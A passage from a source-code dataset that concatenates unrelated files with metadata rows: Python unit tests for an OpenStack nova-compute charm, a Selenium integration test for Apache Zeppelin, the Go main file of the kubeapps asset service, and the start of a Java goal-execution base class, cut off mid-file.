self.test_config.set('rbd-pool', 'nova')
self.test_config.set('ceph-osd-replication-count', 3)
self.test_config.set('ceph-pool-weight', 28)
self.test_config.set('libvirt-image-backend', 'rbd')
self.test_config.set('restrict-ceph-pools', True)
hooks.get_ceph_request()
mock_create_pool.assert_called_with(name='nova', replica_count=3,
weight=28,
group='vms')
mock_request_access.assert_has_calls([
call(name='volumes',
object_prefix_permissions={'class-read': ['rbd_children']},
permission='rwx'),
call(name='images',
object_prefix_permissions={'class-read': ['rbd_children']},
permission='rwx'),
call(name='vms',
object_prefix_permissions={'class-read': ['rbd_children']},
permission='rwx'),
])
@patch.object(hooks, 'service_restart_handler')
@patch.object(hooks, 'CONFIGS')
def test_neutron_plugin_changed(self, configs,
service_restart_handler):
self.nova_metadata_requirement.return_value = (True,
'sharedsecret')
hooks.neutron_plugin_changed()
self.assertTrue(self.apt_update.called)
self.apt_install.assert_called_with(['nova-api-metadata'],
fatal=True)
configs.write.assert_called_with('/etc/nova/nova.conf')
service_restart_handler.assert_called_with(
default_service='nova-compute')
@patch.object(hooks, 'service_restart_handler')
@patch.object(hooks, 'CONFIGS')
def test_neutron_plugin_changed_nometa(self, configs,
service_restart_handler):
self.nova_metadata_requirement.return_value = (False, None)
hooks.neutron_plugin_changed()
self.apt_purge.assert_called_with('nova-api-metadata',
fatal=True)
configs.write.assert_called_with('/etc/nova/nova.conf')
service_restart_handler.assert_called_with(
default_service='nova-compute')
@patch.object(hooks, 'service_restart_handler')
@patch.object(hooks, 'CONFIGS')
def test_neutron_plugin_changed_meta(self, configs,
service_restart_handler):
self.nova_metadata_requirement.return_value = (True, None)
hooks.neutron_plugin_changed()
self.apt_install.assert_called_with(['nova-api-metadata'],
fatal=True)
configs.write.assert_called_with('/etc/nova/nova.conf')
service_restart_handler.assert_called_with(
default_service='nova-compute')
@patch.object(hooks, 'get_hugepage_number')
def test_neutron_plugin_joined_relid(self, get_hugepage_number):
get_hugepage_number.return_value = None
hooks.neutron_plugin_joined(relid='relid23')
expect_rel_settings = {
'hugepage_number': None,
'default_availability_zone': 'nova',
}
self.relation_set.assert_called_with(
relation_id='relid23',
**expect_rel_settings
)
@patch('os.environ.get')
@patch.object(hooks, 'get_hugepage_number')
def test_neutron_plugin_joined_relid_juju_az(self,
get_hugepage_number,
mock_env_get):
self.test_config.set('customize-failure-domain', True)
def environ_get_side_effect(key):
return {
'JUJU_AVAILABILITY_ZONE': 'az1',
}[key]
mock_env_get.side_effect = environ_get_side_effect
get_hugepage_number.return_value = None
hooks.neutron_plugin_joined(relid='relid23')
expect_rel_settings = {
'hugepage_number': None,
'default_availability_zone': 'az1',
}
self.relation_set.assert_called_with(
relation_id='relid23',
**expect_rel_settings
)
@patch.object(hooks, 'get_hugepage_number')
def test_neutron_plugin_joined_huge(self, get_hugepage_number):
get_hugepage_number.return_value = 12
hooks.neutron_plugin_joined()
expect_rel_settings = {
'hugepage_number': 12,
'default_availability_zone': 'nova',
}
self.relation_set.assert_called_with(
relation_id=None,
**expect_rel_settings
)
@patch.object(hooks, 'get_hugepage_number')
def test_neutron_plugin_joined_remote_restart(self, get_hugepage_number):
get_hugepage_number.return_value = None
self.uuid.uuid4.return_value = 'e030b959-7207'
hooks.neutron_plugin_joined(remote_restart=True)
expect_rel_settings = {
'hugepage_number': None,
'restart-trigger': 'e030b959-7207',
'default_availability_zone': 'nova',
}
self.relation_set.assert_called_with(
relation_id=None,
**expect_rel_settings
)
@patch.object(hooks, 'is_unit_paused_set')
def test_service_restart_handler(self,
is_unit_paused_set):
self.relation_get.return_value = None
mock_kv = MagicMock()
mock_kv.get.return_value = None
self.unitdata.kv.return_value = mock_kv
hooks.service_restart_handler(default_service='foorbar')
self.relation_get.assert_called_with(
attribute='restart-nonce',
unit=None,
rid=None
)
is_unit_paused_set.assert_not_called()
@patch.object(hooks, 'is_unit_paused_set')
def test_service_restart_handler_with_service(self,
is_unit_paused_set):
self.relation_get.side_effect = ['nonce', 'foobar-service']
mock_kv = MagicMock()
mock_kv.get.return_value = None
self.unitdata.kv.return_value = mock_kv
is_unit_paused_set.return_value = False
hooks.service_restart_handler()
self.relation_get.assert_has_calls([
call(attribute='restart-nonce',
unit=None,
rid=None),
call(attribute='remote-service',
unit=None,
rid=None),
])
self.service_restart.assert_called_with('foobar-service')
mock_kv.set.assert_called_with('restart-nonce',
'nonce')
self.assertTrue(mock_kv.flush.called)
@patch.object(hooks, 'is_unit_paused_set')
def test_service_restart_handler_when_paused(self,
is_unit_paused_set):
self.relation_get.side_effect = ['nonce', 'foobar-service']
mock_kv = MagicMock()
mock_kv.get.return_value = None
self.unitdata.kv.return_value = mock_kv
is_unit_paused_set.return_value = True
hooks.service_restart_handler()
self.relation_get.assert_has_calls([
call(attribute='restart-nonce',
unit=None,
rid=None),
])
self.service_restart.assert_not_called()
mock_kv.set.assert_called_with('restart-nonce',
'nonce')
self.assertTrue(mock_kv.flush.called)
def test_ceph_access_incomplete(self):
self.relation_get.return_value = None
self.test_config.set('virt-type', 'kvm')
hooks.ceph_access()
self.relation_get.assert_has_calls([
call('key', None, None),
call('secret-uuid', None, None),
])
self.render.assert_not_called()
self.create_libvirt_secret.assert_not_called()
def test_ceph_access_lxd(self):
self.relation_get.side_effect = ['mykey', 'uuid2']
self.remote_service_name.return_value = 'cinder-ceph'
self.test_config.set('virt-type', 'lxd')
hooks.ceph_access()
self.relation_get.assert_has_calls([
call('key', None, None),
call('secret-uuid', None, None),
])
self.render.assert_not_called()
self.create_libvirt_secret.assert_not_called()
self.ensure_ceph_keyring.assert_called_with(
service='cinder-ceph',
user='nova',
group='nova',
key='mykey'
)
def test_ceph_access_complete(self):
self.relation_get.side_effect = ['mykey', 'uuid2']
self.remote_service_name.return_value = 'cinder-ceph'
self.test_config.set('virt-type', 'kvm')
hooks.ceph_access()
self.relation_get.assert_has_calls([
call('key', None, None),
call('secret-uuid', None, None),
])
self.render.assert_called_with(
'secret.xml',
'/etc/ceph/secret-cinder-ceph.xml',
context={'ceph_secret_uuid': 'uuid2',
'service_name': 'cinder-ceph'}
)
self.create_libvirt_secret.assert_called_with(
secret_file='/etc/ceph/secret-cinder-ceph.xml',
secret_uuid='uuid2',
key='mykey',
)
self.ensure_ceph_keyring.assert_called_with(
service='cinder-ceph',
user='nova',
group='nova',
key='mykey'
)
def test_secrets_storage_relation_joined(self):
self.get_relation_ip.return_value = '10.23.1.2'
self.gethostname.return_value = 'testhost'
hooks.secrets_storage_joined()
self.get_relation_ip.assert_called_with('secrets-storage')
self.relation_set.assert_called_with(
relation_id=None,
secret_backend='charm-vaultlocker',
isolated=True,
access_address='10.23.1.2',
hostname='testhost'
)
self.gethostname.assert_called_once_with()
def test_secrets_storage_relation_changed(self,):
self.relation_get.return_value = None
hooks.secrets_storage_changed()
self.configure_local_ephemeral_storage.assert_called_once_with()
def test_cloud_credentials_joined(self):
self.local_unit.return_value = 'nova-compute-cell1/2'
hooks.cloud_credentials_joined()
self.relation_set.assert_called_with(username='nova_compute_cell1')
@patch.object(hooks, 'CONFIGS')
def test_cloud_credentials_changed(self, mock_CONFIGS):
hooks.cloud_credentials_changed()
mock_CONFIGS.write.assert_called_with('/etc/nova/nova.conf')
@patch.object(hooks.grp, 'getgrnam')
def test_upgrade_charm(self, getgrnam):
grp_mock = MagicMock()
grp_mock.gr_gid = None
getgrnam.return_value = grp_mock
self.remove_old_packages.return_value = False
hooks.upgrade_charm()
self.remove_old_packages.assert_called_once_with()
self.assertFalse(self.service_restart.called)
@patch.object(hooks.grp, 'getgrnam')
def test_upgrade_charm_purge(self, getgrnam):
grp_mock = MagicMock()
grp_mock.gr_gid = None
getgrnam.return_value = grp_mock
self.remove_old_packages.return_value = True
self.services.return_value = ['nova-compute']
hooks.upgrade_charm()
self.remove_old_packages.assert_called_once_with()
self.service_restart.assert_called_once_with('nova-compute')
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
zeppelin-server/src/test/java/org/apache/zeppelin/ZeppelinIT.java
|
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.zeppelin;
import static org.junit.Assert.fail;
import org.junit.Test;
import org.openqa.selenium.By;
import org.openqa.selenium.TimeoutException;
import org.openqa.selenium.WebDriver;
import org.openqa.selenium.chrome.ChromeDriver;
import org.openqa.selenium.firefox.FirefoxBinary;
import org.openqa.selenium.firefox.FirefoxDriver;
import org.openqa.selenium.firefox.FirefoxProfile;
import org.openqa.selenium.safari.SafariDriver;
import org.openqa.selenium.support.ui.ExpectedCondition;
import org.openqa.selenium.support.ui.WebDriverWait;
public class ZeppelinIT {
private WebDriver getWebDriver(){
WebDriver driver = null;
if (driver==null){
try {
FirefoxBinary ffox = new FirefoxBinary();
if ("true".equals(System.getenv("TRAVIS"))) {
ffox.setEnvironmentProperty("DISPLAY", ":99"); // xvfb is supposed to run with DISPLAY 99
}
FirefoxProfile profile = new FirefoxProfile();
driver = new FirefoxDriver(ffox, profile);
} catch (Exception e){
}
}
if (driver==null){
try {
driver = new ChromeDriver();
} catch (Exception e){
}
}
if (driver==null){
try {
driver = new SafariDriver();
} catch (Exception e){
}
}
String url;
if (System.getProperty("url")!=null) {
url = System.getProperty("url");
} else {
url = "http://localhost:8080";
}
long start = System.currentTimeMillis();
boolean loaded = false;
driver.get(url);
while (System.currentTimeMillis() - start < 60*1000) {
// wait for page load
try {
(new WebDriverWait(driver, 5)).until(new ExpectedCondition<Boolean>() {
@Override
public Boolean apply(WebDriver d) {
return d.findElement(By.partialLinkText("Start")).isDisplayed();
}
});
loaded = true;
break;
} catch (TimeoutException e){
driver.navigate().to(url);
}
}
if (loaded==false) {
fail();
}
return driver;
}
@Test
public void testDisableIT(){
//
}
/*
@Test
public void testRunSimpleQueryInNewSession() {
// Notice that the remainder of the code relies on the interface,
// not the implementation.
WebDriver driver = getWebDriver();
try {
// click start
WebElement start = driver.findElement(By.partialLinkText("Start"));
start.click();
// Wait for the page to load, timeout after 10 seconds
(new WebDriverWait(driver, 10)).until(new ExpectedCondition<Boolean>() {
public Boolean apply(WebDriver d) {
return d.findElement(By.linkText("Create new Job")).isDisplayed();
}
});
// click new
driver.findElement(By.linkText("Create new Job")).click();
// wait for run button appears
(new WebDriverWait(driver, 10)).until(new ExpectedCondition<Boolean>() {
public Boolean apply(WebDriver d) {
return d.findElement(By.linkText("Run")).isDisplayed();
}
});
// type some query
driver.findElement(By.xpath("//div[@id='zqlEditor']//textarea")).sendKeys("create table if not exists test "+Keys.chord(Keys.SHIFT, "9")+"id STRING);\n");
driver.findElement(By.xpath("//div[@id='zqlEditor']//textarea")).sendKeys("\nshow tables;");
// press run button
driver.findElement(By.linkText("Run")).click();
// wait for button becomes Running ...
(new WebDriverWait(driver, 10)).until(new ExpectedCondition<Boolean>() {
public Boolean apply(WebDriver d) {
return d.findElement(By.xpath("//div//a[text()='Running ...']")).isDisplayed();
}
});
// wait for button becomes Run
(new WebDriverWait(driver, 60)).until(new ExpectedCondition<Boolean>() {
public Boolean apply(WebDriver d) {
return d.findElement(By.xpath("//div//a[text()='Run']")).isDisplayed();
}
});
WebElement msg = driver.findElement(By.id("msgBox"));
if (msg!=null) {
System.out.println("msgBox="+msg.getText());
}
// wait for visualization
(new WebDriverWait(driver, 20)).until(new ExpectedCondition<Boolean>() {
public Boolean apply(WebDriver d) {
return d.findElement(By.xpath("//div[@id='visualizationContainer']//iframe")).isDisplayed();
}
});
WebDriver iframe = driver.switchTo().frame(driver.findElement(By.xpath("//div[@id='visualizationContainer']//iframe")));
// wait for result displayed
(new WebDriverWait(iframe, 20)).until(new ExpectedCondition<Boolean>() {
public Boolean apply(WebDriver d) {
return d.findElement(By.xpath("//table//td[text()='test']")).isDisplayed();
}
});
} catch (WebDriverException e){
File scrFile = ((TakesScreenshot)driver).getScreenshotAs(OutputType.FILE);
System.out.println("Screenshot in: " + scrFile.getAbsolutePath());
throw e;
} finally {
// Close the browser
driver.quit();
}
}
*/
/**
* Get the url of Zeppelin
*
* @param path to add to the url ex: HOST/myPath
* @return Zeppelin url HOST:PORT{/PATH}
*/
private String getUrl(String path) {
String url;
if (System.getProperty("url") != null) {
url = System.getProperty("url");
} else {
url = "http://localhost:8080";
}
if (path != null)
url += path;
return url;
}
/*
@Test
public void testZAN() {
WebDriver driver = getWebDriver();
try {
// goto ZAN menu
driver.findElement(By.xpath("//ul//a[text()='ZAN']")).click();
// wait for ZAN page loaded
(new WebDriverWait(driver, 20)).until(new ExpectedCondition<Boolean>() {
public Boolean apply(WebDriver d) {
return d.findElement(By.xpath("//div//a[text()='Update Catalog']")).isDisplayed();
}
});
} catch (WebDriverException e) {
File scrFile = ((TakesScreenshot) driver)
.getScreenshotAs(OutputType.FILE);
System.out.println("Screenshot in: " + scrFile.getAbsolutePath());
throw e;
} finally {
// Close the browser
driver.quit();
}
}
*/
/**
* Test is swagger-ui is started
*/
/*
@Test
public void testSwaggerDocumentation() {
WebDriver driver = getWebDriver();
try {
driver.get(getUrl("/docs"));
// wait for Swagger page loaded
(new WebDriverWait(driver, 20)).until(new ExpectedCondition<Boolean>() {
public Boolean apply(WebDriver d) {
return d.findElement(By.xpath("//div//input[@id='input_apiKey']")).isDisplayed();
}
});
} catch (WebDriverException ex) {
File scrFile = ((TakesScreenshot) driver).getScreenshotAs(OutputType.FILE);
System.out.println("Screenshot in: " + scrFile.getAbsolutePath());
throw ex;
} finally {
driver.close();
}
}
@Test
public void testAnnotationStmt() {
// Notice that the remainder of the code relies on the interface,
// not the implementation.
WebDriver driver = getWebDriver();
try {
// click start
WebElement start = driver.findElement(By.partialLinkText("Start"));
start.click();
// Wait for the page to load, timeout after 10 seconds
(new WebDriverWait(driver, 10)).until(new ExpectedCondition<Boolean>() {
public Boolean apply(WebDriver d) {
return d.findElement(By.linkText("Create new Job")).isDisplayed();
}
});
// click new
driver.findElement(By.linkText("Create new Job")).click();
// wait for run button appears
(new WebDriverWait(driver, 10)).until(new ExpectedCondition<Boolean>() {
public Boolean apply(WebDriver d) {
return d.findElement(By.linkText("Run")).isDisplayed();
}
});
// type some query with default driver
driver.findElement(By.xpath("//div[@id='zqlEditor']//textarea")).sendKeys("@driver set exec;");
driver.findElement(By.xpath("//div[@id='zqlEditor']//textarea")).sendKeys("\necho 'hello world';");
// press run button
driver.findElement(By.xpath("//div[@id='zqlEditor']//textarea")).sendKeys(Keys.chord(Keys.COMMAND, Keys.ENTER));
driver.findElement(By.xpath("//div[@id='zqlEditor']//textarea")).sendKeys(Keys.chord(Keys.CONTROL, Keys.ENTER));
driver.findElement(By.linkText("Run")).click();
// wait for button becomes Running ...
(new WebDriverWait(driver, 10)).until(new ExpectedCondition<Boolean>() {
public Boolean apply(WebDriver d) {
return d.findElement(By.xpath("//div//a[text()='Running ...']")).isDisplayed();
}
});
// wait for button becomes Run
(new WebDriverWait(driver, 60)).until(new ExpectedCondition<Boolean>() {
public Boolean apply(WebDriver d) {
return d.findElement(By.xpath("//div//a[text()='Run']")).isDisplayed();
}
});
WebElement msg = driver.findElement(By.id("msgBox"));
if (msg!=null) {
System.out.println("msgBox="+msg.getText());
}
// wait for visualization
(new WebDriverWait(driver, 20)).until(new ExpectedCondition<Boolean>() {
public Boolean apply(WebDriver d) {
return d.findElement(By.xpath("//div[@id='visualizationContainer']//iframe")).isDisplayed();
}
});
WebDriver iframe = driver.switchTo().frame(driver.findElement(By.xpath("//div[@id='visualizationContainer']//iframe")));
// wait for result displayed
(new WebDriverWait(iframe, 20)).until(new ExpectedCondition<Boolean>() {
public Boolean apply(WebDriver d) {
return d.findElement(By.xpath("//table//td[text()='hello world']")).isDisplayed();
}
});
} catch (WebDriverException e){
File scrFile = ((TakesScreenshot)driver).getScreenshotAs(OutputType.FILE);
System.out.println("Screenshot in: " + scrFile.getAbsolutePath());
throw e;
} finally {
// Close the browser
driver.quit();
}
}
*/
}
|
[
"\"TRAVIS\""
] |
[] |
[
"TRAVIS"
] |
[]
|
["TRAVIS"]
|
java
| 1 | 0 | |
cmd/assetsvc/main.go
|
/*
Copyright (c) 2017 The Helm Authors
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package main
import (
"flag"
"net/http"
"os"
"github.com/gorilla/mux"
"github.com/heptiolabs/healthcheck"
"github.com/kubeapps/common/datastore"
"github.com/kubeapps/kubeapps/cmd/assetsvc/pkg/utils"
log "github.com/sirupsen/logrus"
"github.com/urfave/negroni"
)
const pathPrefix = "/v1"
// TODO(absoludity): Let's not use globals for storing state like this.
var manager utils.AssetManager
func setupRoutes() http.Handler {
r := mux.NewRouter()
// Healthcheck
health := healthcheck.NewHandler()
r.Handle("/live", health)
r.Handle("/ready", health)
// Routes
apiv1 := r.PathPrefix(pathPrefix).Subrouter()
// TODO: mnelson: Seems we could use path per endpoint handling empty params? Check.
apiv1.Methods("GET").Path("/clusters/{cluster}/namespaces/{namespace}/charts").Handler(WithParams(listChartsWithFilters)) // accepts: name, version, appversion, repos, categories, q, page, size
apiv1.Methods("GET").Path("/clusters/{cluster}/namespaces/{namespace}/charts/categories").Handler(WithParams(getChartCategories))
apiv1.Methods("GET").Path("/clusters/{cluster}/namespaces/{namespace}/charts/{repo}").Handler(WithParams(listChartsWithFilters)) // accepts: name, version, appversion, repos, categories, q, page, size
apiv1.Methods("GET").Path("/clusters/{cluster}/namespaces/{namespace}/charts/{repo}/categories").Handler(WithParams(getChartCategories))
apiv1.Methods("GET").Path("/clusters/{cluster}/namespaces/{namespace}/charts/{repo}/{chartName}").Handler(WithParams(getChart))
apiv1.Methods("GET").Path("/clusters/{cluster}/namespaces/{namespace}/charts/{repo}/{chartName}/versions").Handler(WithParams(listChartVersions))
apiv1.Methods("GET").Path("/clusters/{cluster}/namespaces/{namespace}/charts/{repo}/{chartName}/versions/{version}").Handler(WithParams(getChartVersion))
apiv1.Methods("GET").Path("/clusters/{cluster}/namespaces/{namespace}/assets/{repo}/{chartName}/versions/{version}/README.md").Handler(WithParams(getChartVersionReadme))
apiv1.Methods("GET").Path("/clusters/{cluster}/namespaces/{namespace}/assets/{repo}/{chartName}/versions/{version}/values.yaml").Handler(WithParams(getChartVersionValues))
apiv1.Methods("GET").Path("/clusters/{cluster}/namespaces/{namespace}/assets/{repo}/{chartName}/versions/{version}/values.schema.json").Handler(WithParams(getChartVersionSchema))
apiv1.Methods("GET").Path("/clusters/{cluster}/namespaces/{namespace}/assets/{repo}/{chartName}/logo").Handler(WithParams(getChartIcon))
// Leave icon on the non-cluster aware as it is used from a link in the db data :/
apiv1.Methods("GET").Path("/ns/{namespace}/assets/{repo}/{chartName}/logo").Handler(WithParams(getChartIcon))
n := negroni.Classic()
n.UseHandler(r)
return n
}
func main() {
dbURL := flag.String("database-url", "localhost", "Database URL")
dbName := flag.String("database-name", "charts", "Database database")
dbUsername := flag.String("database-user", "", "Database user")
dbPassword := os.Getenv("DB_PASSWORD")
flag.Parse()
dbConfig := datastore.Config{URL: *dbURL, Database: *dbName, Username: *dbUsername, Password: dbPassword}
kubeappsNamespace := os.Getenv("POD_NAMESPACE")
var err error
manager, err = utils.NewManager("postgresql", dbConfig, kubeappsNamespace)
if err != nil {
log.Fatal(err)
}
err = manager.Init()
if err != nil {
log.Fatal(err)
}
defer manager.Close()
n := setupRoutes()
port := os.Getenv("PORT")
if port == "" {
port = "8080"
}
addr := ":" + port
log.WithFields(log.Fields{"addr": addr}).Info("Started assetsvc")
http.ListenAndServe(addr, n)
}
|
[
"\"DB_PASSWORD\"",
"\"POD_NAMESPACE\"",
"\"PORT\""
] |
[] |
[
"POD_NAMESPACE",
"PORT",
"DB_PASSWORD"
] |
[]
|
["POD_NAMESPACE", "PORT", "DB_PASSWORD"]
|
go
| 3 | 0 | |
lang/src/main/java/com/sap/psr/vulas/goals/AbstractGoal.java
|
package com.sap.psr.vulas.goals;
import java.util.HashMap;
import java.util.Iterator;
import java.util.Map;
import org.apache.commons.configuration.Configuration;
import org.apache.commons.configuration.ConfigurationException;
import org.apache.commons.logging.Log;
import org.apache.commons.logging.LogFactory;
import com.sap.psr.vulas.backend.BackendConnector;
import com.sap.psr.vulas.core.util.CoreConfiguration;
import com.sap.psr.vulas.shared.enums.GoalClient;
import com.sap.psr.vulas.shared.enums.GoalType;
import com.sap.psr.vulas.shared.json.JsonBuilder;
import com.sap.psr.vulas.shared.json.model.Application;
import com.sap.psr.vulas.shared.json.model.Space;
import com.sap.psr.vulas.shared.json.model.Tenant;
import com.sap.psr.vulas.shared.util.MemoryMonitor;
import com.sap.psr.vulas.shared.util.StopWatch;
import com.sap.psr.vulas.shared.util.StringList;
import com.sap.psr.vulas.shared.util.StringList.CaseSensitivity;
import com.sap.psr.vulas.shared.util.StringList.ComparisonMode;
import com.sap.psr.vulas.shared.util.StringUtil;
import com.sap.psr.vulas.shared.util.VulasConfiguration;
/**
* Represents the execution of a goal, which is triggered by client components such as the CLI and the Maven plugin.
* There exist different types of goals, e.g., {@link GoalType#CLEAN} or {@link GoalType#A2C}.
*
* Goal executions can be started and stopped manually using the methods {@link AbstractGoal#start()},
* {@link AbstractGoal#stop()}, {@link AbstractGoal#stop(Exception)} and {@link AbstractGoal#upload(boolean)}.
*
* Goal executions can also be executed automatically using the methods
* {@link AbstractGoal#executeSync()} or {@link AbstractGoal#executeAsync()}, which results in the sequential
* execution of the above-mentioned methods {@link AbstractGoal#start()}, etc.
*
* Subclasses typically override the methods prepareExecution, executeTasks and cleanAfterExecution.
*
* See VULAS-204 in case we run into problems related to special characters in paths.
*/
public abstract class AbstractGoal implements Runnable {
private static final Log log = LogFactory.getLog(AbstractGoal.class);
/** Constant <code>CLASS_EXT</code> */
protected static final String[] CLASS_EXT = new String[] {"CLASS"};
/** Constant <code>JAR_EXT</code> */
protected static final String[] JAR_EXT = new String[] {"jar"};
/** Constant <code>WAR_EXT</code> */
protected static final String[] WAR_EXT = new String[] {"war"};
/** Constant <code>JAR_WAR_EXT</code> */
protected static final String[] JAR_WAR_EXT = new String[] {"jar", "war"};
private GoalClient client = null;
/**
* Random identifier composed of the goal, current time millis and a random number (8 digits).
*/
private String id = null;
private final long createdAt = System.currentTimeMillis();
/**
* The goal-specific configuration.
*/
private VulasConfiguration configuration;
/**
* The context in which the goal is going to be executed.
*/
private GoalContext goalContext = null;
/**
* The goal executed.
*/
private GoalType goalType = null;
/**
* The exception that terminated the goal execution (if any).
* @see #stop(Exception)
*/
private Exception exception = null;
// Stop watch to determine runtime
private StopWatch stopWatch = null;
// Memory monitoring
private MemoryMonitor memoThread = null;
// System information (CPU, OS, JVM, etc.)
private Map<String,String> systemInfo = new HashMap<String,String>();
// Goal-specific stats (set from outside)
private Map<String,Double> goalStats = new HashMap<String,Double>();
private ExecutionObserver observer = null;
/** Determines whether goal execution info will be uploaded. */
private boolean goalUploadEnabled = true;
/*
* Creates a new goal execution.
* @param _app the context of this execution (can be null, i.e., unknown, in case of TEST)
* @param _goal the goal of this execution
* @see
*/
/**
* <p>Constructor for AbstractGoal.</p>
*
* @param _goal a {@link com.sap.psr.vulas.shared.enums.GoalType} object.
*/
protected AbstractGoal(GoalType _goal) {
this(_goal, true);
}
/**
* <p>Constructor for AbstractGoal.</p>
*
* @param _goal a {@link com.sap.psr.vulas.shared.enums.GoalType} object.
* @param _monitor_mem a boolean.
*/
protected AbstractGoal(GoalType _goal, boolean _monitor_mem) {
this.goalType = _goal;
// Create memory monitor (if requested)
if(_monitor_mem)
this.memoThread = new MemoryMonitor();
// Number of processors
this.systemInfo.put("runtime.availableProcessors", Integer.toString(Runtime.getRuntime().availableProcessors()));
}
/**
* <p>Getter for the field <code>id</code>.</p>
*
* @return a {@link java.lang.String} object.
*/
public synchronized String getId() {
if(this.id==null) {
if(this.client!=null)
this.id = this.client + "-" + this.goalType + "-" + this.createdAt+ "-" + (int)Math.abs(Math.random()*100000000);
else
this.id = this.goalType + "-" + this.createdAt+ "-" + (int)Math.abs(Math.random()*100000000);
}
return this.id;
}
/**
* <p>Setter for the field <code>observer</code>.</p>
*
* @param observer a {@link com.sap.psr.vulas.goals.ExecutionObserver} object.
*/
public void setObserver(ExecutionObserver observer) { this.observer = observer; }
/**
* <p>Getter for the field <code>goalType</code>.</p>
*
* @return a {@link com.sap.psr.vulas.shared.enums.GoalType} object.
*/
public GoalType getGoalType() { return this.goalType; }
/**
* <p>getGoalClient.</p>
*
* @return a {@link com.sap.psr.vulas.shared.enums.GoalClient} object.
*/
public GoalClient getGoalClient() { return this.client; }
/**
* <p>setGoalClient.</p>
*
* @param _client a {@link com.sap.psr.vulas.shared.enums.GoalClient} object.
*/
public void setGoalClient(GoalClient _client) { this.client = _client; }
/**
* Returns true if this {@link AbstractGoal} is executed in the given {@link GoalClient}, false otherwise.
*
* @param _client a {@link com.sap.psr.vulas.shared.enums.GoalClient} object.
* @return a boolean.
*/
public boolean runsIn(GoalClient _client) { return this.client!=null && _client!=null && _client.equals(this.client); }
//TODO (17/05/2017): Add callback parameter?
/**
* <p>executeAsync.</p>
*/
public final void executeAsync() {
final Thread t = new Thread(this, "vulas-" + this.goalType.toString().toLowerCase());
t.start();
}
/**
* <p>run.</p>
*/
public final void run() {
try {
this.execute();
} catch (GoalConfigurationException e) {
log.error("Error while configuring " + this + ": " + e.getMessage(), e);
} catch (GoalExecutionException e) {
log.error("Error while executing " + this + ": " + e.getMessage(), e);
}
}
/**
* <p>executeSync.</p>
*
* @throws com.sap.psr.vulas.goals.GoalConfigurationException if any.
* @throws com.sap.psr.vulas.goals.GoalExecutionException if any.
*/
public final void executeSync() throws GoalConfigurationException, GoalExecutionException {
this.execute();
}
private final void execute() throws GoalConfigurationException, GoalExecutionException {
// Execute the goal and measure execution time
try {
this.start();
this.executeTasks();
this.stop();
}
// Throw as is
catch(GoalConfigurationException gce) {
this.stop(gce);
this.skipGoalUpload(); // Do not upload in case of configuration problems
throw gce;
}
// Throw as is
catch(GoalExecutionException gee) {
this.stop(gee);
throw gee;
}
// Embedd in GoalExecutionException
catch(Exception e) {
this.stop(e);
throw new GoalExecutionException(e);
}
finally {
if(this.goalUploadEnabled)
this.upload(false);
}
}
/**
* Returns the configuration of this goal execution. If the configuration has not been set before, a new instance of
* {@link VulasConfiguration} is created and returned. As such, the configuration settings of different goal executions
* can be isolated.
*
* @return a {@link com.sap.psr.vulas.shared.util.VulasConfiguration} object.
*/
protected synchronized final VulasConfiguration getConfiguration() {
if(this.configuration==null)
this.configuration = new VulasConfiguration();
return this.configuration;
}
/**
* <p>Setter for the field <code>configuration</code>.</p>
*
* @param _c a {@link com.sap.psr.vulas.shared.util.VulasConfiguration} object.
* @return a {@link com.sap.psr.vulas.goals.AbstractGoal} object.
*/
public final AbstractGoal setConfiguration(VulasConfiguration _c) { this.configuration = _c; return this;}
/**
* Returns the context of this goal execution. If the context has not been set before, it is constructed
* by reading tenant, space and app information from the configuration obtained from {@link AbstractGoal#getConfiguration()}.
*
* @return a {@link com.sap.psr.vulas.goals.GoalContext} object.
*/
public synchronized final GoalContext getGoalContext() {
if(this.goalContext==null) {
final Configuration c = this.getConfiguration().getConfiguration();
this.goalContext = new GoalContext();
// Configuration
this.goalContext.setVulasConfiguration(this.getConfiguration());
// Tenant
if(!this.getConfiguration().isEmpty(CoreConfiguration.TENANT_TOKEN))
this.goalContext.setTenant(new Tenant(c.getString(CoreConfiguration.TENANT_TOKEN)));
// Space
if(!this.getConfiguration().isEmpty(CoreConfiguration.SPACE_TOKEN)) {
final Space space = new Space();
space.setSpaceToken(c.getString(CoreConfiguration.SPACE_TOKEN));
this.goalContext.setSpace(space);
}
// App
if(Application.canBuildApplication(c.getString(CoreConfiguration.APP_CTX_GROUP), c.getString(CoreConfiguration.APP_CTX_ARTIF), c.getString(CoreConfiguration.APP_CTX_VERSI))) {
final Application a = new Application(c.getString(CoreConfiguration.APP_CTX_GROUP), c.getString(CoreConfiguration.APP_CTX_ARTIF), c.getString(CoreConfiguration.APP_CTX_VERSI));
if(a.isComplete())
this.goalContext.setApplication(a);
else
log.warn("Incomplete application context: " + a.toString());
}
}
return this.goalContext;
}
/**
* <p>Setter for the field <code>goalContext</code>.</p>
*
* @param _ctx a {@link com.sap.psr.vulas.goals.GoalContext} object.
*/
public final void setGoalContext(GoalContext _ctx) {
this.goalContext = _ctx;
}
// >>>>> Methods that can/must be implemented by specific goals
/**
* Cleans the cache of the {@link BackendConnector}.
* CAN be overridden in subclasses to perform additional, goal-specific checks and preparations.
*
* @throws com.sap.psr.vulas.goals.GoalConfigurationException if any.
*/
protected void prepareExecution() throws GoalConfigurationException {
BackendConnector.getInstance().cleanCache();
try {
this.getConfiguration().checkSettings();
} catch (ConfigurationException e) {
throw new GoalConfigurationException(e);
}
}
/**
* CAN be overridden in subclasses.
*
* @throws com.sap.psr.vulas.goals.GoalConfigurationException if any.
*/
protected void checkPreconditions() throws GoalConfigurationException {}
/**
* MUST be overridden in subclasses to implement the goal-specific tasks.
*
* @throws java.lang.Exception if any.
*/
